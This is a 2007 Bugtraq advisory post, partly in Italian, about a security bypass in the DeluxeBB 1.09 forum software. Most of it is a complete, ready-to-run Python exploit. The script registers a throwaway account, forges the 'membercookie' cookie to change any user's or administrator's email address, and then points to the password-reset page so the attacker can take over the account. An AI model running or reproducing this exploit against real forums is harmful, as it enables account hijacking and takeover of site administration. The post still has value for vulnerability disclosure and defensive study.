DeluxeBB E-Mail Address Change Security Bypass Nov 26 2007 07:02PM
bugtraq opencosmo com
http://www.opencosmo.com

http://www.opencosmo.com/news.php?readmore=21

###################################################

DeluxeBB E-Mail Address Change Security Bypass

Crediti: Nexen

Applicazione: DeluxeBB

Versione: 1.09

Impatto: Security Bypass

Rischio: [3/5]

Exploit: #!/usr/bin/python

#-*- coding: iso-8859-15 -*-

'''

_ __ _____ _____ _ __

| '_ \ / _ \ \/ / _ \ '_ | | | | __/> < __/ | | |

|_| |_|\___/_/\_\___|_| |_|

------------------------------------------------------------------------
------------------------

§ DeluxeBB 0day Remote Change Admin's credentials §

------------------------------------------------------------------------
------------------------

nexen

------------------------------------------------------------------------
------------------------

PoC / Bug Explanation:

When you update your profile,

DeluxeBB execute a vulnerable query:

$db->unbuffered_query("UPDATE ".$prefix."users SET email='$xemail', msn='$xmsn', icq='$xicq', ... WHERE (username='$membercookie')");

So, editing cookie "membercookie" you can change remote user's email.

Enjoy ;)

------------------------------------------------------------------------
------------------------

'''

import httplib, urllib, sys, md5

from random import randint

print "\n#####################################################################
###################"

print " DeluxeBB <= 1.09 Remote Admin's/User's Email Change "

print " "

print " Vulnerability Discovered By Nexen "

print " Greetz to The:Paradox that Coded the Exploit. "

print " "

print " Usage: "

print " %s [Target] [VictimNick] [Path] [YourEmail] [AdditionalFlags] " % (sys.argv[0])

print " "

print " Additional Flags: "

print " -id34 -passMypassword -port80 "

print " "

print " Example: "

print " python %s 127.0.0.1 admin /DeluxeBB/ me (at) it (dot) com [email concealed] -port81 " % (sys.argv[0])

print " "

print "#######################################################################
#################\n"

if len(sys.argv)<=4: sys.exit()

else: print "[.]Exploit Starting."

target = sys.argv[1]

admin_nick = sys.argv[2]

path = sys.argv[3]

real_email = sys.argv[4]

botpass = "the-new-administrator"

rand = randint(1, 99999)

dn1 = 0

dn2 = 0

dn3 = 0

try:

for line in sys.argv[:]:

if line.find('-pass') != -1 and dn1 == 0:

upass = line.split('-pass')[1]

dn1 = 1

elif line.find('-pass') == -1 and dn1 == 0:

upass = ""

if line.find('-id') != -1 and dn2 == 0:

userid = line.split('-id')[1]

dn2 = 1

elif line.find('-id') == -1 and dn2 == 0:

userid = ""

if line.find('-port') != -1 and dn3 == 0:

port = line.split('-port')[1]

dn3 = 1

elif line.find('-port') == -1 and dn3 == 0:

port = "80"

except:

sys.exit("[-]Some error in Additional Flag.")

if upass=="" and userid != "" or userid == "" and upass != "":

print "[-]Bad Additional flags -id -pass given, ignoring them."

upass=""

userid=""

########################################################################
####################Trying to connect.

try:

conn = httplib.HTTPConnection(target,port)

conn.request("GET", "")

except: sys.exit("[-]Cannot connect. Check Target.")

########################################################################
####################Registering a new user if id or upass not defined

try:

conn = httplib.HTTPConnection(target,port)

if upass == "" or userid == "":

conn.request("POST", path + "misc.php?sub=register", urllib.urlencode({'submit': 'Register','name': 'th331337.%d' % (rand) , 'pass': botpass,'pass2': botpass,'email': 'root%d (at) yoursystemgotpowned (dot) it [email concealed]' % (rand) }), {"Accept": "text/plain","Content-type": "application/x-www-form-urlencoded"})

response = conn.getresponse()

cookies = response.getheader('set-cookie').split(";")

#print "\n\nth331337.%d \n\nthe-new-administrator" % (rand)

print "[.]Registering a new user. -->",response.status, response.reason

conn.close()

########################################################################
####################Getting memberid in Cookies

for line in cookies[:]:

if line.find('memberid') != -1:

mid = line.split('memberid=')[1]

########################################################################
####################Isset like starts

try: mid

except NameError: sys.exit("[-]Can't Get \"memberid\". Failed. Something has gone wrong. If you have not done yet, you may have to register manually and use flags -id -pass")

except AttributeError:

sys.exit("[-]AttributeError Check your Target/path.")

########################################################################
####################Doing some Md5

if upass=="" or userid=="":

hash = md5.new()

hash.update(botpass)

passmd5 = hash.hexdigest()

else:

hash = md5.new()

hash.update(upass)

passmd5 = hash.hexdigest()

mid = userid

########################################################################
####################Updating "victim" email in Profile

conn = httplib.HTTPConnection(target,port)

conn.request("POST", path+"cp.php?sub=settings", urllib.urlencode({'submit': 'Update','xemail': real_email}), {"Accept": "text/plain","Cookie": "memberid="+mid+"; membercookie="+admin_nick+";memberpw="+passmd5+";" ,"Content-type": "application/x-www-form-urlencoded"})

response = conn.getresponse()

print "[.]Changing \""+admin_nick+"\" Email With \"" + real_email + "\" -->",response.status, response.reason

conn.close()

print "[+]All Done! Email changed!!!\n\n You can reset \""+admin_nick+"\" password here -> "+target+path+"misc.php?sub=lostpw :D\n\n Have Fun =)\n"

Soluzione: Nessuna soluzione disponibile. Scrivere all'amministratore per aggiungere questa informazione.

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus